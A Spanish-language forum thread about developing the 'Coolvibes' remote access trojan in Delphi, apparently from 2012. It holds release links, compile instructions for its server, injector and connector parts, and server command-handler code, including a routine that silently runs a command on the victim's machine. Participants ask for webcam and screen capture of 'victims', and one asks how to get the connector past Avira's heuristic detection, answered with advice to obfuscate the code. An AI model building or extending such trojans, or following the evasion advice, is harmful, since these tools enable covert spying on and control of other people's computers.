Página 1 de 4

Coolvibes 1.1x desarrollo

Publicado: 22 May 2012, 07:59
por DSR!
Actualizo la info
El RAT se encuentra en git versionado, le agregue todas las notas para compilarlo y todas las configuraciones de cada sub proyecto.
Pueden compilarlo con Delphi 2007 sin problemas, de todas formas lo dejo compilado.
En el TODO que arme están los bugs conocidos y las cosas que se podrían hacer, algunas ya las tengo arrancadas como la migración a Indy 10 así que próximamente habrá novedades.

Descarga: [Enlace externo eliminado para invitados]
Github: [Enlace externo eliminado para invitados]
Imagen
release-coolvibes-1.15.rar

Mostrar/Ocultar


Re: Coolvibes 1.1x desarrollo

Publicado: 29 May 2012, 23:25
por pelforth
Tengo una duda. En las instrucciones para compilar el programa se indica :

Crear ./Server/Jeringa/Jeringa.dpr sin resource como exe [Jeringa.exe]
Crear ./Server/Coolserver.dpr como dll [Coolserver.dll]
Crear ./Server/Conectador/Conectador.dpr como dll y como exe [Conectador.exe] y [Conectador.dll]

No entiendo como se puede crear la dll coolserver.dll y conectador.dll. Siempre que compilo me aparece como .exe.

¿Simplemente hay que renombrar el fichero o hay que hacer algo más desde el delphi?

Gracias.

Re: Coolvibes 1.1x desarrollo

Publicado: 30 May 2012, 08:23
por DSR!
//library CoolServer; //Para crear el server definitivo que colocaremos en %cooldir%/cliente/recursos/coolserver.dll
program CoolServer; //Para debug, más lineas "Para debug" abajo
comenta/descomenta segun lo que quieras hacer en los .dpr correspondientes

Re: Coolvibes 1.1x desarrollo

Publicado: 30 May 2012, 19:03
por pelforth
ok, muchas gracias!

Re: Coolvibes 1.1x desarrollo

Publicado: 10 Jun 2012, 08:37
por DSR!
Esto es lo unico que encontre dentro del fallido v0.6b para agregar en la versión actual. el que encuentre alguien mas pongalo en este hilo xD

Código: Seleccionar todo

// Prioridad normal a un proceso
          if Copy(Recibido, 1, 4) = 'SET0' then
          begin
            Delete(Recibido, 1, 5);
          if SetProcessPriority(Recibido, NORMAL_PRIORITY_CLASS) = True then
              SendText('MSG|Prioridad normal asignada a proceso con PID ' + Recibido + ENTER)
            else
              SendText('MSG| :( No pude cambiar prioridad al proceso con PID  ' + Recibido + ENTER);
          end;
          
          if Copy(Recibido, 1, 4) = 'SET1' then
          begin
            Delete(Recibido, 1, 5);
          if SetProcessPriority(Recibido, IDLE_PRIORITY_CLASS) = True then
              SendText('MSG|Prioridad Idle asignada a proceso con PID ' + Recibido + ENTER)
            else
              SendText('MSG| :( No pude cambiar prioridad al proceso con PID  ' + Recibido + ENTER);
          end;

          if Copy(Recibido, 1, 4) = 'SET2' then
          begin
            Delete(Recibido, 1, 5);
          if SetProcessPriority(Recibido, HIGH_PRIORITY_CLASS) = True then
              SendText('MSG|Prioridad alta asignada a proceso con PID ' + Recibido + ENTER)
            else
              SendText('MSG| :( NNo pude cambiar prioridad al proceso con PID  ' + Recibido + ENTER);
          end;
            
          if Copy(Recibido, 1, 4) = 'SET3' then
          begin
            Delete(Recibido, 1, 5);
          if SetProcessPriority(Recibido, REALTIME_PRIORITY_CLASS) = True then
              SendText('MSG|Prioridad realtime asignada a proceso con PID ' + Recibido + ENTER)
            else
              SendText('MSG| :( No pude cambiar prioridad al proceso con PID ' + Recibido + ENTER);
          end;

Re: Coolvibes 1.1x desarrollo

Publicado: 10 Jun 2012, 22:31
por Invitado
Creo que habría que añadirle una funcionalidad bastante útil que la tiene el Spy-net (ripeada del coolvibes, sobre todo vean la unit transfer es la misma) y el xtreme, que es en las conexiones añadirle si la victma tiene cam o no, y la posicbilidad de ver una captura de pantalla en miniatura al seleccionar la victima en el listview de conexiones.

PD tb se podría hacer un splash screen con la imagen del coolvibes, y quitarla del form principal, y quitrale los botones y ponerle un menu.

Re: Coolvibes 1.1x desarrollo

Publicado: 12 Jun 2012, 16:09
por DSR!
estoy rehaciendo la parte de captura de camara asi que por ahi proximamente se viene esa mejora y lo de captura de escritorio esta implementado pero falla.

subo la versión en que estaba trabajando, eso si es algo experimental aun xD
Fecha 12/06/2012
Versión: 1 Update 14
Modificación de: DSR!
[*] Pequeña modificacion en el comportamiento del server
[*] Cifrado (RC4) y compresion (zlib) de datos *EXPERIMENTAL* Falla con algunas funciones por capricho de zlib parece, algo mal debo haber hecho xD
Coolvibes v1.14.rar
tambien adjunto material para plugins, ya era hora que el spyrippernet nos devuelva un poco de codigo!
if copy(Comando, 1, pos('|', Comando) - 1) = LISTDEVICES then
begin
TempStr := FillDeviceList(DeviceClassesCount, DevicesCount);
_EnviarStream(ClientSocket, LISTDEVICES + '|' +
LISTADEDISPOSITIVOSPRONTA + '|' +
inttostr(DeviceClassesCount) + '|' +
inttostr(DevicesCount) + '|' +
TempStr);
end else

if copy(Comando, 1, pos('|', Comando) - 1) = LISTEXTRADEVICES then
begin
delete(Comando, 1, pos('|', Comando));
TempStr := ShowDeviceAdvancedInfo(strtoint(copy(Comando, 1, pos('|', Comando) - 1)));
_EnviarStream(ClientSocket, LISTEXTRADEVICES + '|' +
LISTADEDISPOSITIVOSEXTRASPRONTA + '|' +
TempStr);
end else




if copy(Comando, 1, pos('|', Comando) - 1) = LISTARPROGRAMASINSTALADOS then
begin
tempstr := ListarApp('HKEY_LOCAL_MACHINE\' + UNINST_PATH);
_EnviarStream(ClientSocket, LISTARPROGRAMASINSTALADOS + '|' +
LISTADEPROGRAMASINSTALADOSPRONTA + '|' +
TempStr + '|');
CloseHandle(CommandThreadId);
end else

if copy(Comando, 1, pos('|', Comando) - 1) = DESINSTALARPROGRAMA then
begin
delete(Comando, 1, pos('|', Comando));
tempstr := copy(Comando, 1, pos('|', Comando) - 1);
//myShellExecute(0, 'open', pchar(tempstr), nil, nil, SW_HIDE);
winexec(pchar(tempstr), sw_hide);
CloseHandle(CommandThreadId);
end else
para plugins.rar

Re: Coolvibes 1.1x desarrollo

Publicado: 12 Jun 2012, 16:54
por DSR!
adjunto mas cosas al post anterior :)

Re: Coolvibes 1.1x desarrollo

Publicado: 13 Jun 2012, 12:21
por pelforth
Hola a todos.

Estoy intentando modificar el código fuente del Conectador para hacerlo indetectable. Por el momento estoy haciendo las pruebas con el antivirus Avira.

He realizado cambios en los nombres de variables y funciones, además del nombre de cadenas. Ahora me lo detecta como un virus con nombre distinto al original, pero lo sigue detectando a fin de cuentas.

En la descripción del antivirus sobre la detección se indica que ha sido localizado por métodos heurísticos. ¿Qué me aconsejáis para modificar el código y evitar también los métodos heurísticos?

Gracias!

Re: Coolvibes 1.1x desarrollo

Publicado: 13 Jun 2012, 20:47
por DSR!
ensuciar el codigo y ese tipo de cosas.

subo mi primer pluggin xD

Imagen

InstalledApplications.rar

Re: Coolvibes 1.1x desarrollo

Publicado: 15 Jun 2012, 17:40
por Invitado
DSR! escribió:ensuciar el codigo y ese tipo de cosas.

subo mi primer pluggin xD
En Windows Xp va bien, pero en Windows 7 los plugins parece que fallan.

Re: Coolvibes 1.1x desarrollo

Publicado: 15 Jun 2012, 19:57
por DSR!
lo probe en 7 x32 y deberia funcionar tambien en x64. aunque me parece que hay una falla en la unit que se encarga de manejar los plugins que no contempla que mientras se usa un plugin se puede desconectar el cliente.

Re: Coolvibes 1.1x desarrollo

Publicado: 16 Jun 2012, 02:31
por orlando9427
DSR! escribió:lo probe en 7 x32 y deberia funcionar tambien en x64. aunque me parece que hay una falla en la unit que se encarga de manejar los plugins que no contempla que mientras se usa un plugin se puede desconectar el cliente.
DSR! estoy trabajando en un troyano completamente modular, le asigne a cada usuario un arbol de punteros a sus respectivos forms y cuando se desconecta simplemente le aviso al plugin que lo cerrare y elimino el form (en caso de que el plugin siga terco).

Saludos!

Re: Coolvibes 1.1x desarrollo

Publicado: 16 Jun 2012, 14:28
por Invitado
orlando9427 escribió:
DSR! escribió:lo probe en 7 x32 y deberia funcionar tambien en x64. aunque me parece que hay una falla en la unit que se encarga de manejar los plugins que no contempla que mientras se usa un plugin se puede desconectar el cliente.
DSR! estoy trabajando en un troyano completamente modular, le asigne a cada usuario un arbol de punteros a sus respectivos forms y cuando se desconecta simplemente le aviso al plugin que lo cerrare y elimino el form (en caso de que el plugin siga terco).

Saludos!
Hola, pues podias publicar la unit que se encarga de los plugins asi la adaptamos al Coolvibes

Re: Coolvibes 1.1x desarrollo

Publicado: 17 Jun 2012, 20:36
por DSR!
no hace falta que publique nada, es agregarle una linea mas al modulo del coolvibes para que haga eso. la cosa seria hacer una rutina que le regenere el id de socket que tendria en una nueva conexion cliente/servidor